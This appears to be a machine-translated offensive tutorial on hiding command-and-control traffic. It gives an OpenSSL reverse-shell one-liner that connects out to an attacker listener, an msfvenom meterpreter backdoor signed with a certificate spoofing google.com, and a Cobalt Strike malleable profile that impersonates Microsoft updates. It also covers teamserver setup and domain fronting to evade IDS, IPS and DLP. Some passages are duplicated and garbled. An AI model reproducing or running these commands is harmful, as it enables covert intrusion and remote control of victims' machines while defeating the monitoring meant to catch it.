OpenSSL rebound encrypted shell
OpenSSL is an open source software library. Applications can use this package to communicate securely, avoid eavesdropping, and at the same time confirm the identity of the other end of the connection. This package is widely used on web servers on the Internet
Generate a self-signed certificate using OpenSSL on kali
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Listen port on kali
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
Execute a reverse shell command on the target
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.10.129:8080 > /tmp/s; rm /tmp/s
msf traffic encryption to avoid detection
OpenSSL creates an SSL/TLS certificate
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt>www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
generate backdoor
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.11.132 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat
Copy the generated files to the target machine
Use msf to monitor
From the moment the payload will be executed on the target host, an encrypted meterpreter session will be opened which will not allow the host intrusion prevention system to inspect the packets and disconnect
Capture packet is encrypted
Cobalt strike generates certificates to modify c2 profile traffic encryption confusion
generate free ssl certificate
When running the cobaltstrike.store certificate used by cs by default, the meaning of generating a new certificate is to use our current certificate. The default certificate cs will be detected. The following is the command to generate the certificate.
keytool -genkey -alias moonsec -keyalg RSA -validity 36500 -keystore moonsec.store
Moonsec moonces.store These two strings should be remembered. When modifying the profile, you should use and fill in the relevant region information. After filling in these information, you will also use it on the profile.
After completing the above command, you will be prompted for the password you want to enter. Enter the password moocsec123, and then you will be prompted for the region information. Follow the prompts to fill in step by step.
Create and modify the c2-profile file
set sample_name "xbb POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
#设置证书
https-certificate {
set CN "US";
set O "MicrosoftUpdates";
set C "en";
set L "US";
set OU "MicrosoftUpdates";
set ST "US";
set validity "365";
}
#设置
code-signer{
set keystore "moonsec.store";
set password "moonsec123";
set alias "alias";
}
#指定 DNS beacon 不用的时候指定到 IP 地址
set dns_idle "8.8.4.4";
#每个单独 DNS 请求前强制睡眠时间
set dns_sleep "0";
#通过 DNS 上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
}
}
server {
output {
print;
}
}
}
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
}
}
server {
header "Content-Type" "text/plain";
output {
base64;
print;
}
}
}
test certificate
run teamserver
nohup ./teamserver 192.168.11.132 admin moonsec.profile &
Domain front cobalt strike evades IDS audit
Domain fronting is based on the https unified evasion technology, also known as domain front-end network attack technology. This is a technology used to hide metasploit, cobalt strike and other teams to control server traffic, so as to bypass checker or firewall detection to a certain extent, such as Amazon, Google, Akamai and other large manufacturers will provide some domain front-end technical services
The principle of domain front-end technology: forward the traffic to the real c2 server through the CDN node, where the CDN node ip forwards the traffic by identifying the Host header of the request, using the high credibility of our configured domain name, for example, we can set a Microsoft sub Domain name, which can effectively avoid traffic monitoring such as DLP and agent
Cobalt strike domain pre-configuration
Modify the profile file of c2, select the appropriate profile file at https://github.com/xx0hcd/Malleable-C2-Profiles and modify the domain name prepared by the host header for us
Run teamserver on kali plus configuration files
nohub ./teamserver 192.168.11.132 admin cdn.profile
Add nohub in front of a command to run the command without hanging up. Otherwise, cs will not be able to connect to
x0hcd/Malleable-C2-Profiles if the shell is broken. Select the appropriate profile file and modify the host header to prepare the domain name for us.
Run teamserver on kali plus configuration files
nohub ./teamserver 192.168.11.132 admin cdn.profile
Nohub is added in front of a command to run the command without hanging up, otherwise cs will not be able to connect if the shell is broken